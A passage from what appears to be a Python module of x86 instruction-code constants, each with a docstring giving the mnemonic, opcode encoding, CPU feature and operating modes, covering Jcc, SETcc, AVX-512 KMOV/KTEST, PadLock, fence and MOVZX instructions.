``16/32-bit``
"""
JBE_REL32_64: int = 1874
"""
``JBE rel32``
``o64 0F 86 cd``
``X64``
``64-bit``
"""
JA_REL16: int = 1875
"""
``JA rel16``
``o16 0F 87 cw``
``386+``
``16/32/64-bit``
"""
JA_REL32_32: int = 1876
"""
``JA rel32``
``o32 0F 87 cd``
``386+``
``16/32-bit``
"""
JA_REL32_64: int = 1877
"""
``JA rel32``
``o64 0F 87 cd``
``X64``
``64-bit``
"""
JS_REL16: int = 1878
"""
``JS rel16``
``o16 0F 88 cw``
``386+``
``16/32/64-bit``
"""
JS_REL32_32: int = 1879
"""
``JS rel32``
``o32 0F 88 cd``
``386+``
``16/32-bit``
"""
JS_REL32_64: int = 1880
"""
``JS rel32``
``o64 0F 88 cd``
``X64``
``64-bit``
"""
JNS_REL16: int = 1881
"""
``JNS rel16``
``o16 0F 89 cw``
``386+``
``16/32/64-bit``
"""
JNS_REL32_32: int = 1882
"""
``JNS rel32``
``o32 0F 89 cd``
``386+``
``16/32-bit``
"""
JNS_REL32_64: int = 1883
"""
``JNS rel32``
``o64 0F 89 cd``
``X64``
``64-bit``
"""
JP_REL16: int = 1884
"""
``JP rel16``
``o16 0F 8A cw``
``386+``
``16/32/64-bit``
"""
JP_REL32_32: int = 1885
"""
``JP rel32``
``o32 0F 8A cd``
``386+``
``16/32-bit``
"""
JP_REL32_64: int = 1886
"""
``JP rel32``
``o64 0F 8A cd``
``X64``
``64-bit``
"""
JNP_REL16: int = 1887
"""
``JNP rel16``
``o16 0F 8B cw``
``386+``
``16/32/64-bit``
"""
JNP_REL32_32: int = 1888
"""
``JNP rel32``
``o32 0F 8B cd``
``386+``
``16/32-bit``
"""
JNP_REL32_64: int = 1889
"""
``JNP rel32``
``o64 0F 8B cd``
``X64``
``64-bit``
"""
JL_REL16: int = 1890
"""
``JL rel16``
``o16 0F 8C cw``
``386+``
``16/32/64-bit``
"""
JL_REL32_32: int = 1891
"""
``JL rel32``
``o32 0F 8C cd``
``386+``
``16/32-bit``
"""
JL_REL32_64: int = 1892
"""
``JL rel32``
``o64 0F 8C cd``
``X64``
``64-bit``
"""
JGE_REL16: int = 1893
"""
``JGE rel16``
``o16 0F 8D cw``
``386+``
``16/32/64-bit``
"""
JGE_REL32_32: int = 1894
"""
``JGE rel32``
``o32 0F 8D cd``
``386+``
``16/32-bit``
"""
JGE_REL32_64: int = 1895
"""
``JGE rel32``
``o64 0F 8D cd``
``X64``
``64-bit``
"""
JLE_REL16: int = 1896
"""
``JLE rel16``
``o16 0F 8E cw``
``386+``
``16/32/64-bit``
"""
JLE_REL32_32: int = 1897
"""
``JLE rel32``
``o32 0F 8E cd``
``386+``
``16/32-bit``
"""
JLE_REL32_64: int = 1898
"""
``JLE rel32``
``o64 0F 8E cd``
``X64``
``64-bit``
"""
JG_REL16: int = 1899
"""
``JG rel16``
``o16 0F 8F cw``
``386+``
``16/32/64-bit``
"""
JG_REL32_32: int = 1900
"""
``JG rel32``
``o32 0F 8F cd``
``386+``
``16/32-bit``
"""
JG_REL32_64: int = 1901
"""
``JG rel32``
``o64 0F 8F cd``
``X64``
``64-bit``
"""
SETO_RM8: int = 1902
"""
``SETO r/m8``
``0F 90 /r``
``386+``
``16/32/64-bit``
"""
SETNO_RM8: int = 1903
"""
``SETNO r/m8``
``0F 91 /r``
``386+``
``16/32/64-bit``
"""
SETB_RM8: int = 1904
"""
``SETB r/m8``
``0F 92 /r``
``386+``
``16/32/64-bit``
"""
SETAE_RM8: int = 1905
"""
``SETAE r/m8``
``0F 93 /r``
``386+``
``16/32/64-bit``
"""
SETE_RM8: int = 1906
"""
``SETE r/m8``
``0F 94 /r``
``386+``
``16/32/64-bit``
"""
SETNE_RM8: int = 1907
"""
``SETNE r/m8``
``0F 95 /r``
``386+``
``16/32/64-bit``
"""
SETBE_RM8: int = 1908
"""
``SETBE r/m8``
``0F 96 /r``
``386+``
``16/32/64-bit``
"""
SETA_RM8: int = 1909
"""
``SETA r/m8``
``0F 97 /r``
``386+``
``16/32/64-bit``
"""
SETS_RM8: int = 1910
"""
``SETS r/m8``
``0F 98 /r``
``386+``
``16/32/64-bit``
"""
SETNS_RM8: int = 1911
"""
``SETNS r/m8``
``0F 99 /r``
``386+``
``16/32/64-bit``
"""
SETP_RM8: int = 1912
"""
``SETP r/m8``
``0F 9A /r``
``386+``
``16/32/64-bit``
"""
SETNP_RM8: int = 1913
"""
``SETNP r/m8``
``0F 9B /r``
``386+``
``16/32/64-bit``
"""
SETL_RM8: int = 1914
"""
``SETL r/m8``
``0F 9C /r``
``386+``
``16/32/64-bit``
"""
SETGE_RM8: int = 1915
"""
``SETGE r/m8``
``0F 9D /r``
``386+``
``16/32/64-bit``
"""
SETLE_RM8: int = 1916
"""
``SETLE r/m8``
``0F 9E /r``
``386+``
``16/32/64-bit``
"""
SETG_RM8: int = 1917
"""
``SETG r/m8``
``0F 9F /r``
``386+``
``16/32/64-bit``
"""
VEX_KMOVW_KR_KM16: int = 1918
"""
``KMOVW k1, k2/m16``
``VEX.L0.0F.W0 90 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KMOVQ_KR_KM64: int = 1919
"""
``KMOVQ k1, k2/m64``
``VEX.L0.0F.W1 90 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVB_KR_KM8: int = 1920
"""
``KMOVB k1, k2/m8``
``VEX.L0.66.0F.W0 90 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KMOVD_KR_KM32: int = 1921
"""
``KMOVD k1, k2/m32``
``VEX.L0.66.0F.W1 90 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVW_M16_KR: int = 1922
"""
``KMOVW m16, k1``
``VEX.L0.0F.W0 91 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KMOVQ_M64_KR: int = 1923
"""
``KMOVQ m64, k1``
``VEX.L0.0F.W1 91 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVB_M8_KR: int = 1924
"""
``KMOVB m8, k1``
``VEX.L0.66.0F.W0 91 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KMOVD_M32_KR: int = 1925
"""
``KMOVD m32, k1``
``VEX.L0.66.0F.W1 91 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVW_KR_R32: int = 1926
"""
``KMOVW k1, r32``
``VEX.L0.0F.W0 92 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KMOVB_KR_R32: int = 1927
"""
``KMOVB k1, r32``
``VEX.L0.66.0F.W0 92 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KMOVD_KR_R32: int = 1928
"""
``KMOVD k1, r32``
``VEX.L0.F2.0F.W0 92 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVQ_KR_R64: int = 1929
"""
``KMOVQ k1, r64``
``VEX.L0.F2.0F.W1 92 /r``
``AVX512BW``
``64-bit``
"""
VEX_KMOVW_R32_KR: int = 1930
"""
``KMOVW r32, k1``
``VEX.L0.0F.W0 93 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KMOVB_R32_KR: int = 1931
"""
``KMOVB r32, k1``
``VEX.L0.66.0F.W0 93 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KMOVD_R32_KR: int = 1932
"""
``KMOVD r32, k1``
``VEX.L0.F2.0F.W0 93 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KMOVQ_R64_KR: int = 1933
"""
``KMOVQ r64, k1``
``VEX.L0.F2.0F.W1 93 /r``
``AVX512BW``
``64-bit``
"""
VEX_KORTESTW_KR_KR: int = 1934
"""
``KORTESTW k1, k2``
``VEX.L0.0F.W0 98 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_KORTESTQ_KR_KR: int = 1935
"""
``KORTESTQ k1, k2``
``VEX.L0.0F.W1 98 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KORTESTB_KR_KR: int = 1936
"""
``KORTESTB k1, k2``
``VEX.L0.66.0F.W0 98 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KORTESTD_KR_KR: int = 1937
"""
``KORTESTD k1, k2``
``VEX.L0.66.0F.W1 98 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KTESTW_KR_KR: int = 1938
"""
``KTESTW k1, k2``
``VEX.L0.0F.W0 99 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KTESTQ_KR_KR: int = 1939
"""
``KTESTQ k1, k2``
``VEX.L0.0F.W1 99 /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_KTESTB_KR_KR: int = 1940
"""
``KTESTB k1, k2``
``VEX.L0.66.0F.W0 99 /r``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_KTESTD_KR_KR: int = 1941
"""
``KTESTD k1, k2``
``VEX.L0.66.0F.W1 99 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUSHW_FS: int = 1942
"""
``PUSH FS``
``o16 0F A0``
``386+``
``16/32/64-bit``
"""
PUSHD_FS: int = 1943
"""
``PUSH FS``
``o32 0F A0``
``386+``
``16/32-bit``
"""
PUSHQ_FS: int = 1944
"""
``PUSH FS``
``o64 0F A0``
``X64``
``64-bit``
"""
POPW_FS: int = 1945
"""
``POP FS``
``o16 0F A1``
``386+``
``16/32/64-bit``
"""
POPD_FS: int = 1946
"""
``POP FS``
``o32 0F A1``
``386+``
``16/32-bit``
"""
POPQ_FS: int = 1947
"""
``POP FS``
``o64 0F A1``
``X64``
``64-bit``
"""
CPUID: int = 1948
"""
``CPUID``
``0F A2``
``CPUID``
``16/32/64-bit``
"""
BT_RM16_R16: int = 1949
"""
``BT r/m16, r16``
``o16 0F A3 /r``
``386+``
``16/32/64-bit``
"""
BT_RM32_R32: int = 1950
"""
``BT r/m32, r32``
``o32 0F A3 /r``
``386+``
``16/32/64-bit``
"""
BT_RM64_R64: int = 1951
"""
``BT r/m64, r64``
``o64 0F A3 /r``
``X64``
``64-bit``
"""
SHLD_RM16_R16_IMM8: int = 1952
"""
``SHLD r/m16, r16, imm8``
``o16 0F A4 /r ib``
``386+``
``16/32/64-bit``
"""
SHLD_RM32_R32_IMM8: int = 1953
"""
``SHLD r/m32, r32, imm8``
``o32 0F A4 /r ib``
``386+``
``16/32/64-bit``
"""
SHLD_RM64_R64_IMM8: int = 1954
"""
``SHLD r/m64, r64, imm8``
``o64 0F A4 /r ib``
``X64``
``64-bit``
"""
SHLD_RM16_R16_CL: int = 1955
"""
``SHLD r/m16, r16, CL``
``o16 0F A5 /r``
``386+``
``16/32/64-bit``
"""
SHLD_RM32_R32_CL: int = 1956
"""
``SHLD r/m32, r32, CL``
``o32 0F A5 /r``
``386+``
``16/32/64-bit``
"""
SHLD_RM64_R64_CL: int = 1957
"""
``SHLD r/m64, r64, CL``
``o64 0F A5 /r``
``X64``
``64-bit``
"""
MONTMUL_16: int = 1958
"""
``MONTMUL``
``a16 F3 0F A6 C0``
``PADLOCK_PMM``
``16/32-bit``
"""
MONTMUL_32: int = 1959
"""
``MONTMUL``
``a32 F3 0F A6 C0``
``PADLOCK_PMM``
``16/32/64-bit``
"""
MONTMUL_64: int = 1960
"""
``MONTMUL``
``a64 F3 0F A6 C0``
``PADLOCK_PMM``
``64-bit``
"""
XSHA1_16: int = 1961
"""
``XSHA1``
``a16 F3 0F A6 C8``
``PADLOCK_PHE``
``16/32-bit``
"""
XSHA1_32: int = 1962
"""
``XSHA1``
``a32 F3 0F A6 C8``
``PADLOCK_PHE``
``16/32/64-bit``
"""
XSHA1_64: int = 1963
"""
``XSHA1``
``a64 F3 0F A6 C8``
``PADLOCK_PHE``
``64-bit``
"""
XSHA256_16: int = 1964
"""
``XSHA256``
``a16 F3 0F A6 D0``
``PADLOCK_PHE``
``16/32-bit``
"""
XSHA256_32: int = 1965
"""
``XSHA256``
``a32 F3 0F A6 D0``
``PADLOCK_PHE``
``16/32/64-bit``
"""
XSHA256_64: int = 1966
"""
``XSHA256``
``a64 F3 0F A6 D0``
``PADLOCK_PHE``
``64-bit``
"""
XBTS_R16_RM16: int = 1967
"""
``XBTS r16, r/m16``
``o16 0F A6 /r``
``386 A0``
``16/32-bit``
"""
XBTS_R32_RM32: int = 1968
"""
``XBTS r32, r/m32``
``o32 0F A6 /r``
``386 A0``
``16/32-bit``
"""
XSTORE_16: int = 1969
"""
``XSTORE``
``a16 0F A7 C0``
``PADLOCK_RNG``
``16/32-bit``
"""
XSTORE_32: int = 1970
"""
``XSTORE``
``a32 0F A7 C0``
``PADLOCK_RNG``
``16/32/64-bit``
"""
XSTORE_64: int = 1971
"""
``XSTORE``
``a64 0F A7 C0``
``PADLOCK_RNG``
``64-bit``
"""
XCRYPTECB_16: int = 1972
"""
``XCRYPTECB``
``a16 F3 0F A7 C8``
``PADLOCK_ACE``
``16/32-bit``
"""
XCRYPTECB_32: int = 1973
"""
``XCRYPTECB``
``a32 F3 0F A7 C8``
``PADLOCK_ACE``
``16/32/64-bit``
"""
XCRYPTECB_64: int = 1974
"""
``XCRYPTECB``
``a64 F3 0F A7 C8``
``PADLOCK_ACE``
``64-bit``
"""
XCRYPTCBC_16: int = 1975
"""
``XCRYPTCBC``
``a16 F3 0F A7 D0``
``PADLOCK_ACE``
``16/32-bit``
"""
XCRYPTCBC_32: int = 1976
"""
``XCRYPTCBC``
``a32 F3 0F A7 D0``
``PADLOCK_ACE``
``16/32/64-bit``
"""
XCRYPTCBC_64: int = 1977
"""
``XCRYPTCBC``
``a64 F3 0F A7 D0``
``PADLOCK_ACE``
``64-bit``
"""
XCRYPTCTR_16: int = 1978
"""
``XCRYPTCTR``
``a16 F3 0F A7 D8``
``PADLOCK_ACE``
``16/32-bit``
"""
XCRYPTCTR_32: int = 1979
"""
``XCRYPTCTR``
``a32 F3 0F A7 D8``
``PADLOCK_ACE``
``16/32/64-bit``
"""
XCRYPTCTR_64: int = 1980
"""
``XCRYPTCTR``
``a64 F3 0F A7 D8``
``PADLOCK_ACE``
``64-bit``
"""
XCRYPTCFB_16: int = 1981
"""
``XCRYPTCFB``
``a16 F3 0F A7 E0``
``PADLOCK_ACE``
``16/32-bit``
"""
XCRYPTCFB_32: int = 1982
"""
``XCRYPTCFB``
``a32 F3 0F A7 E0``
``PADLOCK_ACE``
``16/32/64-bit``
"""
XCRYPTCFB_64: int = 1983
"""
``XCRYPTCFB``
``a64 F3 0F A7 E0``
``PADLOCK_ACE``
``64-bit``
"""
XCRYPTOFB_16: int = 1984
"""
``XCRYPTOFB``
``a16 F3 0F A7 E8``
``PADLOCK_ACE``
``16/32-bit``
"""
XCRYPTOFB_32: int = 1985
"""
``XCRYPTOFB``
``a32 F3 0F A7 E8``
``PADLOCK_ACE``
``16/32/64-bit``
"""
XCRYPTOFB_64: int = 1986
"""
``XCRYPTOFB``
``a64 F3 0F A7 E8``
``PADLOCK_ACE``
``64-bit``
"""
IBTS_RM16_R16: int = 1987
"""
``IBTS r/m16, r16``
``o16 0F A7 /r``
``386 A0``
``16/32-bit``
"""
IBTS_RM32_R32: int = 1988
"""
``IBTS r/m32, r32``
``o32 0F A7 /r``
``386 A0``
``16/32-bit``
"""
# CMPXCHG486_*: early Intel486 A-step encodings of CMPXCHG (opcode bytes
# 0F A6 / 0F A7). Note these opcode bytes are the same ones used by the
# 386-A0 XBTS/IBTS entries above, which is why both variants exist here.
CMPXCHG486_RM8_R8: int = 1989
"""
``CMPXCHG r/m8, r8``
``0F A6 /r``
``486 A``
``16/32-bit``
"""
CMPXCHG486_RM16_R16: int = 1990
"""
``CMPXCHG r/m16, r16``
``o16 0F A7 /r``
``486 A``
``16/32-bit``
"""
CMPXCHG486_RM32_R32: int = 1991
"""
``CMPXCHG r/m32, r32``
``o32 0F A7 /r``
``486 A``
``16/32-bit``
"""
PUSHW_GS: int = 1992
"""
``PUSH GS``
``o16 0F A8``
``386+``
``16/32/64-bit``
"""
PUSHD_GS: int = 1993
"""
``PUSH GS``
``o32 0F A8``
``386+``
``16/32-bit``
"""
PUSHQ_GS: int = 1994
"""
``PUSH GS``
``o64 0F A8``
``X64``
``64-bit``
"""
POPW_GS: int = 1995
"""
``POP GS``
``o16 0F A9``
``386+``
``16/32/64-bit``
"""
POPD_GS: int = 1996
"""
``POP GS``
``o32 0F A9``
``386+``
``16/32-bit``
"""
POPQ_GS: int = 1997
"""
``POP GS``
``o64 0F A9``
``X64``
``64-bit``
"""
RSM: int = 1998
"""
``RSM``
``0F AA``
``386+``
``16/32/64-bit``
"""
BTS_RM16_R16: int = 1999
"""
``BTS r/m16, r16``
``o16 0F AB /r``
``386+``
``16/32/64-bit``
"""
BTS_RM32_R32: int = 2000
"""
``BTS r/m32, r32``
``o32 0F AB /r``
``386+``
``16/32/64-bit``
"""
BTS_RM64_R64: int = 2001
"""
``BTS r/m64, r64``
``o64 0F AB /r``
``X64``
``64-bit``
"""
SHRD_RM16_R16_IMM8: int = 2002
"""
``SHRD r/m16, r16, imm8``
``o16 0F AC /r ib``
``386+``
``16/32/64-bit``
"""
SHRD_RM32_R32_IMM8: int = 2003
"""
``SHRD r/m32, r32, imm8``
``o32 0F AC /r ib``
``386+``
``16/32/64-bit``
"""
SHRD_RM64_R64_IMM8: int = 2004
"""
``SHRD r/m64, r64, imm8``
``o64 0F AC /r ib``
``X64``
``64-bit``
"""
SHRD_RM16_R16_CL: int = 2005
"""
``SHRD r/m16, r16, CL``
``o16 0F AD /r``
``386+``
``16/32/64-bit``
"""
SHRD_RM32_R32_CL: int = 2006
"""
``SHRD r/m32, r32, CL``
``o32 0F AD /r``
``386+``
``16/32/64-bit``
"""
SHRD_RM64_R64_CL: int = 2007
"""
``SHRD r/m64, r64, CL``
``o64 0F AD /r``
``X64``
``64-bit``
"""
FXSAVE_M512BYTE: int = 2008
"""
``FXSAVE m512byte``
``NP 0F AE /0``
``FXSR``
``16/32/64-bit``
"""
FXSAVE64_M512BYTE: int = 2009
"""
``FXSAVE64 m512byte``
``NP o64 0F AE /0``
``FXSR``
``64-bit``
"""
RDFSBASE_R32: int = 2010
"""
``RDFSBASE r32``
``F3 0F AE /0``
``FSGSBASE``
``64-bit``
"""
RDFSBASE_R64: int = 2011
"""
``RDFSBASE r64``
``F3 o64 0F AE /0``
``FSGSBASE``
``64-bit``
"""
FXRSTOR_M512BYTE: int = 2012
"""
``FXRSTOR m512byte``
``NP 0F AE /1``
``FXSR``
``16/32/64-bit``
"""
FXRSTOR64_M512BYTE: int = 2013
"""
``FXRSTOR64 m512byte``
``NP o64 0F AE /1``
``FXSR``
``64-bit``
"""
RDGSBASE_R32: int = 2014
"""
``RDGSBASE r32``
``F3 0F AE /1``
``FSGSBASE``
``64-bit``
"""
RDGSBASE_R64: int = 2015
"""
``RDGSBASE r64``
``F3 o64 0F AE /1``
``FSGSBASE``
``64-bit``
"""
LDMXCSR_M32: int = 2016
"""
``LDMXCSR m32``
``NP 0F AE /2``
``SSE``
``16/32/64-bit``
"""
WRFSBASE_R32: int = 2017
"""
``WRFSBASE r32``
``F3 0F AE /2``
``FSGSBASE``
``64-bit``
"""
WRFSBASE_R64: int = 2018
"""
``WRFSBASE r64``
``F3 o64 0F AE /2``
``FSGSBASE``
``64-bit``
"""
VEX_VLDMXCSR_M32: int = 2019
"""
``VLDMXCSR m32``
``VEX.LZ.0F.WIG AE /2``
``AVX``
``16/32/64-bit``
"""
STMXCSR_M32: int = 2020
"""
``STMXCSR m32``
``NP 0F AE /3``
``SSE``
``16/32/64-bit``
"""
WRGSBASE_R32: int = 2021
"""
``WRGSBASE r32``
``F3 0F AE /3``
``FSGSBASE``
``64-bit``
"""
WRGSBASE_R64: int = 2022
"""
``WRGSBASE r64``
``F3 o64 0F AE /3``
``FSGSBASE``
``64-bit``
"""
VEX_VSTMXCSR_M32: int = 2023
"""
``VSTMXCSR m32``
``VEX.LZ.0F.WIG AE /3``
``AVX``
``16/32/64-bit``
"""
XSAVE_MEM: int = 2024
"""
``XSAVE mem``
``NP 0F AE /4``
``XSAVE``
``16/32/64-bit``
"""
XSAVE64_MEM: int = 2025
"""
``XSAVE64 mem``
``NP o64 0F AE /4``
``XSAVE``
``64-bit``
"""
PTWRITE_RM32: int = 2026
"""
``PTWRITE r/m32``
``F3 0F AE /4``
``PTWRITE``
``16/32/64-bit``
"""
PTWRITE_RM64: int = 2027
"""
``PTWRITE r/m64``
``F3 o64 0F AE /4``
``PTWRITE``
``64-bit``
"""
XRSTOR_MEM: int = 2028
"""
``XRSTOR mem``
``NP 0F AE /5``
``XSAVE``
``16/32/64-bit``
"""
XRSTOR64_MEM: int = 2029
"""
``XRSTOR64 mem``
``NP o64 0F AE /5``
``XSAVE``
``64-bit``
"""
INCSSPD_R32: int = 2030
"""
``INCSSPD r32``
``F3 0F AE /5``
``CET_SS``
``16/32/64-bit``
"""
INCSSPQ_R64: int = 2031
"""
``INCSSPQ r64``
``F3 o64 0F AE /5``
``CET_SS``
``64-bit``
"""
XSAVEOPT_MEM: int = 2032
"""
``XSAVEOPT mem``
``NP 0F AE /6``
``XSAVEOPT``
``16/32/64-bit``
"""
XSAVEOPT64_MEM: int = 2033
"""
``XSAVEOPT64 mem``
``NP o64 0F AE /6``
``XSAVEOPT``
``64-bit``
"""
CLWB_M8: int = 2034
"""
``CLWB m8``
``66 0F AE /6``
``CLWB``
``16/32/64-bit``
"""
TPAUSE_R32: int = 2035
"""
``TPAUSE r32, <edx>, <eax>``
``66 0F AE /6``
``WAITPKG``
``16/32/64-bit``
"""
TPAUSE_R64: int = 2036
"""
``TPAUSE r64, <edx>, <eax>``
``66 o64 0F AE /6``
``WAITPKG``
``64-bit``
"""
CLRSSBSY_M64: int = 2037
"""
``CLRSSBSY m64``
``F3 0F AE /6``
``CET_SS``
``16/32/64-bit``
"""
UMONITOR_R16: int = 2038
"""
``UMONITOR r16``
``a16 F3 0F AE /6``
``WAITPKG``
``16/32-bit``
"""
UMONITOR_R32: int = 2039
"""
``UMONITOR r32``
``a32 F3 0F AE /6``
``WAITPKG``
``16/32/64-bit``
"""
UMONITOR_R64: int = 2040
"""
``UMONITOR r64``
``a64 F3 0F AE /6``
``WAITPKG``
``64-bit``
"""
UMWAIT_R32: int = 2041
"""
``UMWAIT r32, <edx>, <eax>``
``F2 0F AE /6``
``WAITPKG``
``16/32/64-bit``
"""
UMWAIT_R64: int = 2042
"""
``UMWAIT r64, <edx>, <eax>``
``F2 o64 0F AE /6``
``WAITPKG``
``64-bit``
"""
CLFLUSH_M8: int = 2043
"""
``CLFLUSH m8``
``NP 0F AE /7``
``CLFSH``
``16/32/64-bit``
"""
CLFLUSHOPT_M8: int = 2044
"""
``CLFLUSHOPT m8``
``66 0F AE /7``
``CLFLUSHOPT``
``16/32/64-bit``
"""
# LFENCE group: NP 0F AE E8 is the canonical encoding; the E9-EF entries
# below carry the identical LFENCE mnemonic, CPUID feature and mode lines —
# only the low three bits of the final opcode byte differ.
LFENCE: int = 2045
"""
``LFENCE``
``NP 0F AE E8``
``SSE2``
``16/32/64-bit``
"""
LFENCE_E9: int = 2046
"""
``LFENCE``
``NP 0F AE E9``
``SSE2``
``16/32/64-bit``
"""
LFENCE_EA: int = 2047
"""
``LFENCE``
``NP 0F AE EA``
``SSE2``
``16/32/64-bit``
"""
LFENCE_EB: int = 2048
"""
``LFENCE``
``NP 0F AE EB``
``SSE2``
``16/32/64-bit``
"""
LFENCE_EC: int = 2049
"""
``LFENCE``
``NP 0F AE EC``
``SSE2``
``16/32/64-bit``
"""
LFENCE_ED: int = 2050
"""
``LFENCE``
``NP 0F AE ED``
``SSE2``
``16/32/64-bit``
"""
LFENCE_EE: int = 2051
"""
``LFENCE``
``NP 0F AE EE``
``SSE2``
``16/32/64-bit``
"""
LFENCE_EF: int = 2052
"""
``LFENCE``
``NP 0F AE EF``
``SSE2``
``16/32/64-bit``
"""
# MFENCE group: NP 0F AE F0 is the canonical encoding; the F1-F7 entries
# below carry the identical MFENCE mnemonic, CPUID feature and mode lines —
# only the low three bits of the final opcode byte differ.
MFENCE: int = 2053
"""
``MFENCE``
``NP 0F AE F0``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F1: int = 2054
"""
``MFENCE``
``NP 0F AE F1``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F2: int = 2055
"""
``MFENCE``
``NP 0F AE F2``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F3: int = 2056
"""
``MFENCE``
``NP 0F AE F3``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F4: int = 2057
"""
``MFENCE``
``NP 0F AE F4``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F5: int = 2058
"""
``MFENCE``
``NP 0F AE F5``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F6: int = 2059
"""
``MFENCE``
``NP 0F AE F6``
``SSE2``
``16/32/64-bit``
"""
MFENCE_F7: int = 2060
"""
``MFENCE``
``NP 0F AE F7``
``SSE2``
``16/32/64-bit``
"""
# SFENCE group: NP 0F AE F8 is the canonical encoding; the F9-FF entries
# below carry the identical SFENCE mnemonic, CPUID feature and mode lines —
# only the low three bits of the final opcode byte differ.
SFENCE: int = 2061
"""
``SFENCE``
``NP 0F AE F8``
``SSE``
``16/32/64-bit``
"""
SFENCE_F9: int = 2062
"""
``SFENCE``
``NP 0F AE F9``
``SSE``
``16/32/64-bit``
"""
SFENCE_FA: int = 2063
"""
``SFENCE``
``NP 0F AE FA``
``SSE``
``16/32/64-bit``
"""
SFENCE_FB: int = 2064
"""
``SFENCE``
``NP 0F AE FB``
``SSE``
``16/32/64-bit``
"""
SFENCE_FC: int = 2065
"""
``SFENCE``
``NP 0F AE FC``
``SSE``
``16/32/64-bit``
"""
SFENCE_FD: int = 2066
"""
``SFENCE``
``NP 0F AE FD``
``SSE``
``16/32/64-bit``
"""
SFENCE_FE: int = 2067
"""
``SFENCE``
``NP 0F AE FE``
``SSE``
``16/32/64-bit``
"""
SFENCE_FF: int = 2068
"""
``SFENCE``
``NP 0F AE FF``
``SSE``
``16/32/64-bit``
"""
PCOMMIT: int = 2069
"""
``PCOMMIT``
``66 0F AE F8``
``PCOMMIT``
``16/32/64-bit``
"""
IMUL_R16_RM16: int = 2070
"""
``IMUL r16, r/m16``
``o16 0F AF /r``
``386+``
``16/32/64-bit``
"""
IMUL_R32_RM32: int = 2071
"""
``IMUL r32, r/m32``
``o32 0F AF /r``
``386+``
``16/32/64-bit``
"""
IMUL_R64_RM64: int = 2072
"""
``IMUL r64, r/m64``
``o64 0F AF /r``
``X64``
``64-bit``
"""
CMPXCHG_RM8_R8: int = 2073
"""
``CMPXCHG r/m8, r8``
``0F B0 /r``
``486+``
``16/32/64-bit``
"""
CMPXCHG_RM16_R16: int = 2074
"""
``CMPXCHG r/m16, r16``
``o16 0F B1 /r``
``486+``
``16/32/64-bit``
"""
CMPXCHG_RM32_R32: int = 2075
"""
``CMPXCHG r/m32, r32``
``o32 0F B1 /r``
``486+``
``16/32/64-bit``
"""
CMPXCHG_RM64_R64: int = 2076
"""
``CMPXCHG r/m64, r64``
``o64 0F B1 /r``
``X64``
``64-bit``
"""
LSS_R16_M1616: int = 2077
"""
``LSS r16, m16:16``
``o16 0F B2 /r``
``386+``
``16/32/64-bit``
"""
LSS_R32_M1632: int = 2078
"""
``LSS r32, m16:32``
``o32 0F B2 /r``
``386+``
``16/32/64-bit``
"""
LSS_R64_M1664: int = 2079
"""
``LSS r64, m16:64``
``o64 0F B2 /r``
``X64``
``64-bit``
"""
BTR_RM16_R16: int = 2080
"""
``BTR r/m16, r16``
``o16 0F B3 /r``
``386+``
``16/32/64-bit``
"""
BTR_RM32_R32: int = 2081
"""
``BTR r/m32, r32``
``o32 0F B3 /r``
``386+``
``16/32/64-bit``
"""
BTR_RM64_R64: int = 2082
"""
``BTR r/m64, r64``
``o64 0F B3 /r``
``X64``
``64-bit``
"""
LFS_R16_M1616: int = 2083
"""
``LFS r16, m16:16``
``o16 0F B4 /r``
``386+``
``16/32/64-bit``
"""
LFS_R32_M1632: int = 2084
"""
``LFS r32, m16:32``
``o32 0F B4 /r``
``386+``
``16/32/64-bit``
"""
LFS_R64_M1664: int = 2085
"""
``LFS r64, m16:64``
``o64 0F B4 /r``
``X64``
``64-bit``
"""
LGS_R16_M1616: int = 2086
"""
``LGS r16, m16:16``
``o16 0F B5 /r``
``386+``
``16/32/64-bit``
"""
LGS_R32_M1632: int = 2087
"""
``LGS r32, m16:32``
``o32 0F B5 /r``
``386+``
``16/32/64-bit``
"""
LGS_R64_M1664: int = 2088
"""
``LGS r64, m16:64``
``o64 0F B5 /r``
``X64``
``64-bit``
"""
MOVZX_R16_RM8: int = 2089
"""
``MOVZX r16, r/m8``
``o16 0F B6 /r``
``386+``
``16/32/64-bit``
"""
MOVZX_R32_RM8: int = 2090
"""
``MOVZX r32, r/m8``
``o32 0F B6 /r``
``386+``
``16/32/64-bit``
"""
MOVZX_R64_RM8: int = 2091
"""
``MOVZX r64, r/m8``
``o64 0F B6 /r``
``X64``
``64-bit``
"""
MOVZX_R16_RM16: int = 2092
"""
``MOVZX r16, r/m16``
``o16 0F B7 /r``
``386+``
``16/32/64-bit``
"""
MOVZX_R32_RM16: int = 2093
"""
``MOVZX r32, r/m16``
``o32 0F B7 /r``
``386+``
``16/32/64-bit``
"""
MOVZX_R64_RM16: int = 2094
"""
``MOVZX r64, r/m16``
``o64 0F B7 /r``
``X64``
``64-bit``
"""
JMPE_DISP16: int = 2095
"""
``JMPE disp16``
``o16 0F B8 cw``
``IA-64``
``16/32-bit``
"""
JMPE_DISP32: int = 2096
"""
``JMPE disp32``
``o32 0F B8 cd``
``IA-64``
``16/32-bit``
"""
POPCNT_R16_RM16: int = 2097
"""
